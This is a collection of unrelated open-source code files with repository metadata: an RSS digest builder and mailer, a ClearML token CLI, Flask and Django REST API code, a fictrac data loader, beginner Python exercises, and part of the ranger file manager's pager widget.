in rss_info_list:\n if(isinstance(tmp_rss_info_atom, int)):\n remaining_amount = remaining_amount + 1\n \n print(\"当前进度 | 剩余数量\", remaining_amount, \"已完成==>>\", len(rss_info_list)-remaining_amount)\n return result[\"result\"]\n \n\n\ndef send_mail(email, title, contents):\n # 判断secret.json是否存在\n user = \"\"\n password = \"\"\n host = \"\"\n try:\n if(os.environ[\"USER\"]):\n user = os.environ[\"USER\"]\n if(os.environ[\"PASSWORD\"]):\n password = os.environ[\"PASSWORD\"]\n if(os.environ[\"HOST\"]):\n host = os.environ[\"HOST\"]\n except:\n print(\"无法获取github的secrets配置信息,开始使用本地变量\")\n if(os.path.exists(os.path.join(os.getcwd(),\"secret.json\"))):\n with open(os.path.join(os.getcwd(),\"secret.json\"),'r') as load_f:\n load_dict = json.load(load_f)\n user = load_dict[\"user\"]\n password = load_dict[\"password\"]\n host = load_dict[\"host\"]\n # print(load_dict)\n else:\n print(\"无法获取发件人信息\")\n \n # 连接邮箱服务器\n # yag = yagmail.SMTP(user=user, password=password, host=host)\n yag = yagmail.SMTP(user = user, password = password, host=host)\n # 发送邮件\n yag.send(email, title, contents)\n\ndef replace_readme():\n new_edit_readme_md = [\"\", \"\"]\n current_date_news_index = [\"\"]\n\n\n \n # 读取EditREADME.md\n print(\"replace_readme\")\n new_num = 0\n with open(os.path.join(os.getcwd(),\"EditREADME.md\"),'r') as load_f:\n edit_readme_md = load_f.read();\n\n\n\n new_edit_readme_md[0] = edit_readme_md\n before_info_list = re.findall(r'\\{\\{latest_content\\}\\}.*\\[订阅地址\\]\\(.*\\)' ,edit_readme_md);\n # 填充统计RSS数量\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"{{rss_num}}\", str(len(before_info_list)))\n # 填充统计时间\n ga_rss_datetime = datetime.fromtimestamp(int(time.time()),pytz.timezone('Asia/Shanghai')).strftime('%Y-%m-%d %H:%M:%S')\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"{{ga_rss_datetime}}\", str(ga_rss_datetime))\n\n # 使用进程池进行数据获取,获得rss_info_list\n before_info_list_len = len(before_info_list)\n rss_info_list = Manager().list(range(before_info_list_len))\n print('初始化完毕==》', rss_info_list)\n\n \n\n # 创建一个最多开启8进程的进程池\n po = Pool(8)\n\n for index, before_info in enumerate(before_info_list):\n # 获取link\n link = re.findall(r'\\[订阅地址\\]\\((.*)\\)', before_info)[0]\n po.apply_async(get_rss_info,(link, index, rss_info_list))\n\n\n # 关闭进程池,不再接收新的任务,开始执行任务\n po.close()\n\n # 主进程等待所有子进程结束\n po.join()\n print(\"----结束----\", rss_info_list)\n\n\n for index, before_info in enumerate(before_info_list):\n # 获取link\n link = re.findall(r'\\[订阅地址\\]\\((.*)\\)', before_info)[0]\n # 生成超链接\n rss_info = rss_info_list[index]\n latest_content = \"\"\n parse_result = urlparse(link)\n scheme_netloc_url = str(parse_result.scheme)+\"://\"+str(parse_result.netloc)\n latest_content = \"[暂无法通过爬虫获取信息, 点击进入源网站主页](\"+ scheme_netloc_url +\")\"\n\n # 加入到索引\n try:\n for rss_info_atom in rss_info:\n if (rss_info_atom[\"date\"] == datetime.today().strftime(\"%Y-%m-%d\")):\n new_num = new_num + 1\n if (new_num % 2) == 0:\n current_date_news_index[0] = current_date_news_index[0] + \"\"\n else:\n current_date_news_index[0] = current_date_news_index[0] + \"\"\n\n except:\n print(\"An exception occurred\")\n \n\n \n if(len(rss_info) > 0):\n rss_info[0][\"title\"] = rss_info[0][\"title\"].replace(\"|\", \"\\|\")\n rss_info[0][\"title\"] = rss_info[0][\"title\"].replace(\"[\", \"\\[\")\n rss_info[0][\"title\"] = rss_info[0][\"title\"].replace(\"]\", \"\\]\")\n\n latest_content = \"[\" + \"‣ \" + rss_info[0][\"title\"] + ( \" 🌈 \" + rss_info[0][\"date\"] if (rss_info[0][\"date\"] == datetime.today().strftime(\"%Y-%m-%d\")) else \" \\| \" + rss_info[0][\"date\"] ) +\"](\" + rss_info[0][\"link\"] +\")\" \n\n if(len(rss_info) > 1):\n rss_info[1][\"title\"] = rss_info[1][\"title\"].replace(\"|\", \"\\|\")\n rss_info[1][\"title\"] = rss_info[1][\"title\"].replace(\"[\", \"\\[\")\n rss_info[1][\"title\"] = rss_info[1][\"title\"].replace(\"]\", \"\\]\")\n\n latest_content = latest_content + \"
[\" + \"‣ \" + rss_info[1][\"title\"] + ( \" 🌈 \" + rss_info[0][\"date\"] if (rss_info[0][\"date\"] == datetime.today().strftime(\"%Y-%m-%d\")) else \" \\| \" + rss_info[0][\"date\"] ) +\"](\" + rss_info[1][\"link\"] +\")\"\n\n # 生成after_info\n after_info = before_info.replace(\"{{latest_content}}\", latest_content)\n print(\"====latest_content==>\", latest_content)\n # 替换edit_readme_md中的内容\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(before_info, after_info)\n \n # 替换EditREADME中的索引\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"{{news}}\", current_date_news_index[0])\n # 替换EditREADME中的新文章数量索引\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"{{new_num}}\", str(new_num))\n # 添加CDN\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"./_media\", \"https://cdn.jsdelivr.net/gh/zhaoolee/garss/_media\")\n \n # 将新内容\n with open(os.path.join(os.getcwd(),\"README.md\"),'w') as load_f:\n load_f.write(new_edit_readme_md[0])\n \n\n mail_re = r'邮件内容区开始>([.\\S\\s]*)<邮件内容区结束'\n reResult = re.findall(mail_re, new_edit_readme_md[0])\n new_edit_readme_md[1] = reResult\n\n \n return new_edit_readme_md\n\n# 将README.md复制到docs中\n\ndef cp_readme_md_to_docs():\n shutil.copyfile(os.path.join(os.getcwd(),\"README.md\"), os.path.join(os.getcwd(), \"docs\",\"README.md\"))\n \ndef cp_media_to_docs():\n if os.path.exists(os.path.join(os.getcwd(), \"docs\",\"_media\")):\n shutil.rmtree(os.path.join(os.getcwd(), \"docs\",\"_media\"))\t\n shutil.copytree(os.path.join(os.getcwd(),\"_media\"), os.path.join(os.getcwd(), \"docs\",\"_media\"))\n\ndef get_email_list():\n email_list = []\n with open(os.path.join(os.getcwd(),\"tasks.json\"),'r') as load_f:\n load_dic = json.load(load_f)\n for task in load_dic[\"tasks\"]:\n email_list.append(task[\"email\"])\n return email_list\n\n# 创建opml订阅文件\n\ndef create_opml():\n\n result = \"\";\n result_v1 = \"\";\n\n # \n\n with open(os.path.join(os.getcwd(),\"EditREADME.md\"),'r') as load_f:\n edit_readme_md = load_f.read();\n\n ## 将信息填充到opml_info_list\n opml_info_text_list = re.findall(r'.*\\{\\{latest_content\\}\\}.*\\[订阅地址\\]\\(.*\\).*' ,edit_readme_md);\n\n for opml_info_text in opml_info_text_list:\n\n\n # print('==', opml_info_text)\n\n opml_info_text_format_data = re.match(r'\\|(.*)\\|(.*)\\|(.*)\\|(.*)\\|.*\\[订阅地址\\]\\((.*)\\).*\\|',opml_info_text)\n\n # print(\"data==>>\", opml_info_text_format_data)\n\n # print(\"总信息\", opml_info_text_format_data[0].strip())\n # print(\"编号==>>\", opml_info_text_format_data[1].strip())\n # print(\"text==>>\", opml_info_text_format_data[2].strip())\n # print(\"description==>>\", opml_info_text_format_data[3].strip())\n # print(\"data004==>>\", opml_info_text_format_data[4].strip())\n print('##',opml_info_text_format_data[2].strip())\n print(opml_info_text_format_data[3].strip())\n print(opml_info_text_format_data[5].strip())\n \n\n opml_info = {}\n opml_info[\"text\"] = opml_info_text_format_data[2].strip()\n opml_info[\"description\"] = opml_info_text_format_data[3].strip()\n opml_info[\"htmlUrl\"] = opml_info_text_format_data[5].strip()\n opml_info[\"title\"] = opml_info_text_format_data[2].strip()\n opml_info[\"xmlUrl\"] = opml_info_text_format_data[5].strip()\n\n # print('opml_info==>>', opml_info);\n \n\n\n opml_info_text = ''\n\n opml_info_text_v1 = ' '\n\n opml_info_text = opml_info_text.format(\n text=opml_info[\"text\"], \n description=opml_info[\"description\"], \n htmlUrl = opml_info[\"htmlUrl\"],\n title=opml_info[\"title\"],\n xmlUrl=opml_info[\"xmlUrl\"]\n )\n\n opml_info_text_v1 = opml_info_text_v1.format(\n htmlUrl = opml_info[\"htmlUrl\"],\n title=opml_info[\"title\"],\n xmlUrl=opml_info[\"xmlUrl\"]\n )\n\n result = result + opml_info_text + \"\\n\"\n\n result_v1 = result_v1 + opml_info_text_v1 + \"\\n\"\n \n zhaoolee_github_garss_subscription_list = \"\";\n with open(os.path.join(os.getcwd(),\"rss-template-v2.txt\"),'r') as load_f:\n zhaoolee_github_garss_subscription_list_template = load_f.read();\n GMT_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'\n date_created = datetime.utcnow().strftime(GMT_FORMAT);\n date_modified = datetime.utcnow().strftime(GMT_FORMAT);\n zhaoolee_github_garss_subscription_list = zhaoolee_github_garss_subscription_list_template.format(result=result, date_created=date_created, date_modified=date_modified);\n # print(zhaoolee_github_garss_subscription_list);\n\n # 将内容写入\n with open(os.path.join(os.getcwd(),\"zhaoolee_github_garss_subscription_list_v2.opml\"),'w') as load_f:\n load_f.write(zhaoolee_github_garss_subscription_list)\n\n zhaoolee_github_garss_subscription_list_v1 = \"\"\n with open(os.path.join(os.getcwd(),\"rss-template-v1.txt\"),'r') as load_f:\n zhaoolee_github_garss_subscription_list_template = load_f.read();\n zhaoolee_github_garss_subscription_list_v1 = zhaoolee_github_garss_subscription_list_template.format(result=result_v1);\n # print(zhaoolee_github_garss_subscription_list_v1);\n\n # 将内容写入\n with open(os.path.join(os.getcwd(),\"zhaoolee_github_garss_subscription_list_v1.opml\"),'w') as load_f:\n load_f.write(zhaoolee_github_garss_subscription_list_v1)\n\n\n\n\n \n # print(result)\n\ndef create_json():\n result = {\"garssInfo\": []}\n with open(os.path.join(os.getcwd(),\"EditREADME.md\"),'r') as load_f:\n edit_readme_md = load_f.read();\n ## 将信息填充到opml_info_list\n opml_info_text_list = re.findall(r'.*\\{\\{latest_content\\}\\}.*\\[订阅地址\\]\\(.*\\).*' ,edit_readme_md);\n for opml_info_text in opml_info_text_list:\n opml_info_text_format_data = re.match(r'\\|(.*)\\|(.*)\\|(.*)\\|(.*)\\|.*\\[订阅地址\\]\\((.*)\\).*\\|',opml_info_text)\n opml_info = {}\n opml_info[\"description\"] = opml_info_text_format_data[3].strip()\n opml_info[\"title\"] = opml_info_text_format_data[2].strip()\n opml_info[\"xmlUrl\"] = opml_info_text_format_data[5].strip()\n result[\"garssInfo\"].append(opml_info)\n with open(\"./garssInfo.json\",\"w\", encoding=\"utf-8\") as f:\n json.dump(result, f, ensure_ascii=False, indent=4)\n\ndef main():\n create_json()\n create_opml()\n readme_md = replace_readme()\n content = markdown.markdown(readme_md[0], extensions=['tables', 'fenced_code'])\n cp_readme_md_to_docs()\n cp_media_to_docs()\n email_list = get_email_list()\n\n mail_re = r'邮件内容区开始>([.\\S\\s]*)<邮件内容区结束'\n reResult = re.findall(mail_re, readme_md[0])\n\n try:\n send_mail(email_list, \"嘎!RSS订阅\", reResult)\n except Exception as e:\n print(\"==邮件设信息置错误===》》\", e)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"zhaoolee/garss","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15381,"program_lang":"python","lang":"en","doc_type":"code","stars":969,"dataset":"github-code","pt":"21"} +{"seq_id":"30570233796","text":"\"\"\" Command line tools for the API server \"\"\"\nfrom argparse import ArgumentParser\n\nimport dpath\nfrom humanfriendly import parse_timespan\n\n\ndef setup():\n from apiserver.database import db\n db.initialize()\n\n\ndef gen_token(args):\n from apiserver.bll.auth import AuthBLL\n resp = AuthBLL.get_token_for_user(args.user_id, args.company_id, parse_timespan(args.expiration))\n print('Token:\\n%s' % resp.token)\n\n\ndef safe_get(obj, glob, default=None, separator=\"/\"):\n try:\n return dpath.get(obj, glob, separator=separator)\n except KeyError:\n return default\n\n\nif __name__ == '__main__':\n top_parser = ArgumentParser(__doc__)\n\n subparsers = top_parser.add_subparsers(title='Sections')\n\n token = subparsers.add_parser('token')\n token_commands = token.add_subparsers(title='Commands')\n token_create = token_commands.add_parser('generate', description='Generate a new token')\n token_create.add_argument('--user-id', '-u', help='User ID', required=True)\n token_create.add_argument('--company-id', '-c', help='Company ID', required=True)\n token_create.add_argument('--expiration', '-exp',\n help=\"Token expiration (time span, shorthand suffixes are supported, default 1m)\",\n default=parse_timespan('1m'))\n token_create.set_defaults(_func=gen_token)\n\n args = top_parser.parse_args()\n if args._func:\n setup()\n args._func(args)\n","repo_name":"allegroai/clearml-server","sub_path":"apiserver/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"21"} +{"seq_id":"28934016996","text":"from flask import Flask\nfrom app.database import connect_db\nimport os\n\nSECRET_KEY = os.environ.get('SECRET_KEY', 'j8k9z411b')\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get(\n 'DATABASE_URL', 'postgres:///ffl-trades-db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SECRET_KEY'] = SECRET_KEY\n\nconnect_db(app)\n","repo_name":"leshawn-rice/ffl-trade-tips","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13613754141","text":"# Suponiendo que se han ejecutado las siguientes sentencias de asignación:\nancho = 17\nalto = 12.0\n# Para cada una de las expresiones siguientes, intenta adivinar el valor de la expresión y su tipo sin ejecutarlas en el intérprete:\n# 1. ancho / 2\n# 2. ancho // 2\n# 3. alto / 3\n# 4. 1 + 2 * 5\n\n\n# 1. El valor es 8.5 y es float.\n# 2. El valor es 8 y es int.\n# 3. El valor es 4.0 y es float.\n# 4. El valor es 11 y es int.\n\ndef primeraexp(ancho):\n resultado1 = ancho / 2\n return str(resultado1)\n\ndef segundaexp(ancho):\n resultado2 = ancho // 2\n return str(resultado2)\n\ndef tercerexp(alto):\n resultado3 = alto / 3\n return str(resultado3)\n\nif __name__ == \"__main__\":\n print(\"El primer resultado es \" + primeraexp(ancho))\n print(\"El segundo resultado es \"+ segundaexp(ancho))\n print(\"El tercer resultado es \"+ tercerexp(alto))\n","repo_name":"IES-Rafael-Alberti/2324-u1-primeros-programas-FcoJose2","sub_path":"src/Ejercicio2_3.py","file_name":"Ejercicio2_3.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"373017234","text":"from django.shortcuts import render\nfrom rest_framework.generics import (\n ListAPIView, RetrieveAPIView, DestroyAPIView, UpdateAPIView, CreateAPIView,\n RetrieveUpdateAPIView\n)\nfrom post.models import Post\nfrom .serializers import PostSerializer, PostCreateSerializer, PostUpdateSerializer\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.filters import SearchFilter, OrderingFilter\nfrom rest_framework.mixins import ListModelMixin\nfrom rest_framework.throttling import ScopedRateThrottle\nfrom .paginations import PostPagination\n#custom permission\nfrom .permissions import isOwnerOrSuperUser\n\n\nclass PostListAPIView(ListAPIView):\n # queryset = Post.objects.all() # tumunu cekiyor\n serializer_class = PostSerializer\n #arama SearchFilter and siralama OrderingFilter\n filter_backends = [SearchFilter, OrderingFilter]\n search_fields = ['title', 'content']\n # SearchFilter /api/post/list/?search=es\n # OrderingFilter /api/post/list/?search=es&ordering=title (ordering=-title : ters siralama | reverse orderings)\n throttle_classes = [ScopedRateThrottle]\n throttle_scope = 'post'\n \n # pagination\n pagination_class = PostPagination\n\n # filtreleme\n def get_queryset(self):\n queryset = Post.objects.filter(draft=False)\n return queryset\n #__note: once data filtrelenip gonderiliyor ve search yapildiginda bu filtre dikkate aliniyor\n \n\n\nclass PostDetailAPIView(RetrieveAPIView):\n queryset = Post.objects.all() # ?- detail de neden .all() diyoruz?\n serializer_class = PostSerializer # ?- detail post serializer tanimlanabilir mi?\n lookup_field = 'slug'\n # lookup_field = 'pk'\n # note: lookup_field hic yazilmazsa default ta pk yani id ile calisiyor. url kismina detail/ seklinde yazilmali\n\n\nclass PostUpdateAPIView(RetrieveUpdateAPIView):\n queryset = Post.objects.all()\n serializer_class = PostUpdateSerializer\n lookup_field = 'slug'\n permission_classes = [isOwnerOrSuperUser]\n\n def perform_update(self, serializer):\n serializer.save(modified_by_user=self.request.user)\n # update islemi yapan user'i eklemak icin\n\n\nclass PostDeleteAPIView(DestroyAPIView):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n lookup_field = 'slug'\n permission_classes = [IsAuthenticated, isOwnerOrSuperUser]\n\n\nclass PostCreateAPIView(CreateAPIView, ListModelMixin):\n queryset = Post.objects.all()\n serializer_class = PostCreateSerializer\n permission_classes = [IsAuthenticated]\n\n # mixin usage: boylece /api/post/create/ url'i Allow: GET 'e izin veriyor ve datalari da gonderebiliyoruz\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def perform_create(self, serializer):\n serializer.save(user=self.request.user)\n","repo_name":"m-gunes/django-rest-framework","sub_path":"post/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6698076101","text":"import numpy as np\nimport sys\nimport os\nimport scipy\nimport scipy.signal\nimport pandas as pd\nfrom scipy.interpolate import interp1d\n\ndef load_fictrac(directory, file='fictrac.dat'):\n \"\"\" Loads fictrac data from .dat file that fictrac outputs.\n\n To-do: change units based on diameter of ball etc.\n For speed sanity check, instead remove bad frames so we don't have to throw out whole trial.\n\n Parameters\n ----------\n directory: string of full path to file\n file: string of file name\n\n Returns\n -------\n fictrac_data: pandas dataframe of all parameters saved by fictrac \"\"\"\n\n for item in os.listdir(directory):\n if '.dat' in item:\n file = item\n\n with open(os.path.join(directory, file),'r') as f:\n df = pd.DataFrame(l.rstrip().split() for l in f)\n\n # Name columns\n df = df.rename(index=str, columns={0: 'frameCounter',\n 1: 'dRotCamX',\n 2: 'dRotCamY',\n 3: 'dRotCamZ',\n 4: 'dRotScore',\n 5: 'dRotLabX',\n 6: 'dRotLabY',\n 7: 'dRotLabZ',\n 8: 'AbsRotCamX',\n 9: 'AbsRotCamY',\n 10: 'AbsRotCamZ',\n 11: 'AbsRotLabX',\n 12: 'AbsRotLabY',\n 13: 'AbsRotLabZ',\n 14: 'positionX',\n 15: 'positionY',\n 16: 'heading',\n 17: 'runningDir',\n 18: 'speed',\n 19: 'integratedX',\n 20: 'integratedY',\n 21: 'timeStamp',\n 22: 'sequence'})\n\n # Remove commas\n for column in df.columns.values[:-1]:\n df[column] = [float(x[:-1]) for x in df[column]]\n\n fictrac_data = df\n \n # sanity check for extremely high speed (fictrac failure)\n speed = np.asarray(fictrac_data['speed'])\n max_speed = np.max(speed)\n if max_speed > 10:\n raise Exception('Fictrac ball tracking failed (reporting impossibly high speed).')\n return fictrac_data\n\ndef interpolate_fictrac(fictrac, timestamps, fps, dur, behavior='speed',sigma=3,sign=None):\n \"\"\" Interpolate fictrac.\n\n Parameters\n ----------\n fictrac: fictrac pandas dataframe.\n timestamps: [t,z] numpy array of imaging timestamps (to interpolate to).\n fps: camera frame rate (Hz)\n dur: int, duration of fictrac recording (in ms)\n behavior: column of dataframe to use\n sigma: for smoothing\n\n Returns\n -------\n fictrac_interp: [t,z] numpy array of fictrac interpolated to timestamps\n\n \"\"\"\n camera_rate = 1/fps * 1000 # camera frame rate in ms\n raw_fictrac_times = np.arange(0,dur,camera_rate)\n \n # Cut off any extra frames (only happened with brain 4)\n fictrac = fictrac[:90000]\n \n if behavior == 'my_speed':\n dx = np.asarray(fictrac['dRotLabX'])\n dy = np.asarray(fictrac['dRotLabY'])\n dx = scipy.ndimage.filters.gaussian_filter(dx,sigma=3)\n dy = scipy.ndimage.filters.gaussian_filter(dy,sigma=3)\n fictrac_smoothed = np.sqrt(dx*dx + dy*dy)\n elif behavior == 'speed_all_3':\n dx = np.asarray(fictrac['dRotLabX'])\n dy = np.asarray(fictrac['dRotLabY'])\n dz = np.asarray(fictrac['dRotLabZ'])\n dx = scipy.ndimage.filters.gaussian_filter(dx,sigma=3)\n dy = scipy.ndimage.filters.gaussian_filter(dy,sigma=3)\n dz = scipy.ndimage.filters.gaussian_filter(dz,sigma=3)\n fictrac_smoothed = np.sqrt(dx*dx + dy*dy + dz*dz)\n else:\n fictrac_smoothed = scipy.ndimage.filters.gaussian_filter(np.asarray(fictrac[behavior]),sigma=sigma)\n\n if sign is not None and sign == 'abs':\n fictrac_smoothed = np.abs(fictrac_smoothed)\n elif sign is not None and sign == 'plus':\n fictrac_smoothed = np.clip(fictrac_smoothed,a_min=0,a_max=None)\n elif sign is not None and sign == 'minus':\n fictrac_smoothed = np.clip(fictrac_smoothed,a_min=None,a_max=0)\n elif sign is not None and sign == 'df':\n fictrac_smoothed = np.append(np.diff(fictrac_smoothed),0)\n elif sign is not None and sign == 'df_abs':\n fictrac_smoothed = np.abs(np.append(np.diff(fictrac_smoothed),0))\n\n # Interpolate\n # Warning: interp1d set to fill in out of bounds times\n fictrac_interp_temp = interp1d(raw_fictrac_times, fictrac_smoothed, bounds_error = False)\n fictrac_interp = fictrac_interp_temp(timestamps)\n \n # Replace Nans with zeros (for later code)\n np.nan_to_num(fictrac_interp, copy=False);\n \n return fictrac_interp\n\ndef smooth_and_interp_fictrac(fictrac, fps, resolution, expt_len, behavior, timestamps=None, smoothing=25, z=None):\n\n if behavior == 'dRotLabZpos':\n behavior = 'dRotLabZ'\n clip = 'pos'\n elif behavior == 'dRotLabZneg':\n behavior = 'dRotLabZ'\n clip = 'neg'\n else:\n clip = None\n\n ### get orginal timestamps ###\n camera_rate = 1/fps * 1000 # camera frame rate in ms\n x_original = np.arange(0,expt_len,camera_rate)\n\n ### smooth ###\n fictrac_smoothed = scipy.signal.savgol_filter(np.asarray(fictrac[behavior]),smoothing,3)\n\n ### clip if desired ###\n if clip == 'pos':\n fictrac_smoothed = np.clip(fictrac_smoothed, a_min=0, a_max=None)\n elif clip == 'neg':\n fictrac_smoothed = np.clip(fictrac_smoothed, a_min=None, a_max=0)*-1\n\n ### interpolate ###\n fictrac_interp_temp = interp1d(x_original, fictrac_smoothed, bounds_error = False)\n xnew = np.arange(0,expt_len,resolution) #0 to last time at subsample res\n if timestamps is None:\n fictrac_interp = fictrac_interp_temp(xnew)\n else:\n fictrac_interp = fictrac_interp_temp(timestamps[:,z])\n\n ### convert units for common cases ###\n sphere_radius = 4.5e-3 # in m\n if behavior in ['dRotLabY']:\n ''' starts with units of rad/frame\n * sphere_radius(m); now in m/frame\n * fps; now in m/sec\n * 1000; now in mm/sec '''\n \n fictrac_interp = fictrac_interp * sphere_radius * fps * 1000 # now in mm/sec\n \n if behavior in ['dRotLabZ']:\n ''' starts with units of rad/frame\n * 180 / np.pi; now in deg/frame\n * fps; now in deg/sec '''\n \n fictrac_interp = fictrac_interp * 180 / np.pi * fps\n \n # Replace Nans with zeros (for later code)\n np.nan_to_num(fictrac_interp, copy=False);\n \n return fictrac_interp","repo_name":"ClandininLab/brainsss","sub_path":"brainsss/fictrac.py","file_name":"fictrac.py","file_ext":"py","file_size_in_byte":6847,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"18152755235","text":"# task1\r\n# рекурсивная функция получения факториала числа n\r\n\r\ndef factorial(n):\r\n while n != 0:\r\n return n * (factorial(n - 1))\r\n else:\r\n return 1\r\n\r\n\r\nnum = int(input(\"Введите число: \"))\r\nprint(factorial(num))\r\n\r\n# последовательность фиббоначи\r\nn = int(input(\"число для фиббоначе: \"))\r\na, b = 0, 1\r\nwhile b <= n:\r\n a, b = b, a + b\r\n print(a)\r\n\r\n# создать словарь из двух словарей и отсортировать по длинне ключей\r\ndict_1 = {'верный': [11, 55.2, 'слон'],\r\n 'фиолетовый': 15, 'орда': 'восемь'}\r\ndict_2 = {'ода': {52, 99, 2}, 'сороконожка': {110, 'слово', 15}}\r\ndict_3 = {}\r\n# добавляем в новый словарь\r\ndict_3.update(dict_1)\r\ndict_3.update(dict_2)\r\n\r\nnew_dict = {}\r\nlist_k = list(dict_3.keys())\r\n# сортировка ключей\r\nlist_k.sort(key=len)\r\nfor i in list_k:\r\n new_dict[i] = dict_3[i]\r\nprint(new_dict)\r\n\r\n\r\n# task2\r\n# без знаков припинания\r\ndef task_1(a):\r\n new_str = ''\r\n f = ['.', ',', '?']\r\n for i in a:\r\n if i not in f:\r\n new_str += i\r\n return new_str\r\n\r\n\r\n# без букв верхнего регистра\r\ndef task_2(a):\r\n new_str = ''\r\n for i in a:\r\n if i.isupper():\r\n pass\r\n else:\r\n new_str += i\r\n return new_str\r\n\r\n\r\n# всю строку в верхнем регистре\r\ndef task_3(a):\r\n return a.upper()\r\n\r\n\r\n# изменить регистр вверхний - нижний и наоборот\r\ndef task_4(a):\r\n new_str = ''\r\n for i in a:\r\n if i.isupper():\r\n new_str += i.lower()\r\n else:\r\n new_str += i.upper()\r\n return new_str\r\n\r\n\r\n# заменить все знаки препинания на пробелы\r\ndef task_5(a):\r\n new_str = ''\r\n f = '.,?'\r\n for i in a:\r\n if i in f:\r\n new_str += \" \"\r\n else:\r\n new_str += i\r\n return new_str\r\n\r\n\r\nstring_ = \"Что это было?...Я не ожидал увидеть подобного, но мне придется принять решение\"\r\nprint(task_1(string_))\r\nprint(task_2(string_))\r\nprint(task_3(string_))\r\nprint(task_4(string_))\r\nprint(task_5(string_))\r\n","repo_name":"Nastassia2334/HomeWork","sub_path":"lesson_32_Shelepen/lesson_32_practice_Shelepen.py","file_name":"lesson_32_practice_Shelepen.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73038536373","text":"# This file is part of ranger, the console file manager.\n# License: GNU GPL version 3, see the file \"AUTHORS\" for details.\n\n\"\"\"The pager displays text and allows you to scroll inside it.\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function)\n\nimport curses\nimport logging\n\nfrom ranger.gui import ansi\nfrom ranger.ext.direction import Direction\nfrom ranger.ext.img_display import ImgDisplayUnsupportedException\n\nfrom . import Widget\n\n\nLOG = logging.getLogger(__name__)\n\n\n# TODO: Scrolling in embedded pager\nclass Pager(Widget): # pylint: disable=too-many-instance-attributes\n source = None\n source_is_stream = False\n\n old_source = None\n old_scroll_begin = 0\n old_startx = 0\n need_clear_image = False\n need_redraw_image = False\n max_width = None\n\n def __init__(self, win, embedded=False):\n Widget.__init__(self, win)\n self.embedded = embedded\n self.scroll_begin = 0\n self.startx = 0\n self.markup = None\n self.lines = []\n self.image = None\n self.image_drawn = False\n\n def _close_source(self):\n if self.source and self.source_is_stream:\n try:\n self.source.close()\n except OSError as ex:\n LOG.error('Unable to close pager source')\n LOG.exception(ex)\n\n def open(self):\n self.scroll_begin = 0\n self.markup = None\n self.max_width = 0\n self.startx = 0\n self.need_redraw = True\n\n def clear_image(self, force=False):\n if (force or self.need_clear_image) and self.image_drawn:\n self.fm.image_displayer.clear(self.x, self.y, self.wid, self.hei)\n self.need_clear_image = False\n self.image_drawn = False\n\n def close(self):\n if self.image:\n self.need_clear_image = True\n self.clear_image()\n self._close_source()\n\n def destroy(self):\n self.clear_image(force=True)\n Widget.destroy(self)\n\n def finalize(self):\n self.fm.ui.win.move(self.y, self.x)\n\n def draw(self):\n if self.need_clear_image:\n self.need_redraw = True\n\n if self.old_source != self.source:\n self.old_source = self.source\n self.need_redraw = True\n\n if self.old_scroll_begin != self.scroll_begin or \\\n self.old_startx != self.startx:\n self.old_startx = self.startx\n self.old_scroll_begin = self.scroll_begin\n self.need_redraw = True\n\n if self.need_redraw:\n self.win.erase()\n self.need_redraw_image = True\n self.clear_image()\n\n if not self.image:\n line_gen = self._generate_lines(\n starty=self.scroll_begin, startx=self.startx)\n\n for line, i in zip(line_gen, range(self.hei)):\n self._draw_line(i, line)\n\n self.need_redraw = False\n\n def draw_image(self):\n if self.image and self.need_redraw_image:\n self.source = None\n self.need_redraw_image = False\n try:\n self.fm.image_displayer.draw(self.image, self.x, self.y,\n self.wid, self.hei)\n except ImgDisplayUnsupportedException:\n self.fm.settings.preview_images = False\n except Exception as ex: # pylint: disable=broad-except\n self.fm.notify(ex, bad=True)\n else:\n self.image_drawn = True\n\n def _draw_line(self, i, line):\n if self.markup is None:\n self.addstr(i, 0, line)\n elif self.markup == 'ansi':\n try:\n self.win.move(i, 0)\n except curses.error:\n pass\n else:\n for chunk in ansi.text_with_fg_bg_attr(line):\n if isinstance(chunk, tuple):\n self.set_fg_bg_attr(*chunk)\n else:\n self.addstr(chunk)\n\n def move(self, narg=None, **kw):\n direction = Direction(kw)\n if direction.horizontal():\n self.startx = direction.move(\n direction=direction.right(),\n override=narg,\n maximum=self.max_width,\n current=self.startx,\n pagesize=self.wid,\n offset=-self.wid + 1)\n if direction.vertical():\n movement = dict(\n direction=direction.down(),\n override=narg,\n current=self.scroll_begin,\n pagesize=self.hei,\n offset=-self.hei + 1)\n if self.source_is_stream:\n # For streams, we first pretend that the content ends much later,\n # in case there are still unread lines.\n desired_position = direction.move(\n maximum=len(self.lines) + 9999,\n **movement)\n # Then, read the new lines as needed to produce a more accurate\n # maximum for the movement:\n self._get_line(desired_position + self.hei)\n self.scroll_begin = direction.move(\n maximum=len(self.lines),\n **movement)\n\n def press(self, key):\n self.fm.ui.keymaps.use_keymap('pager')\n self.fm.ui.press(key)\n\n def set_image(self, image):\n if self.image:\n self.need_clear_image = True\n 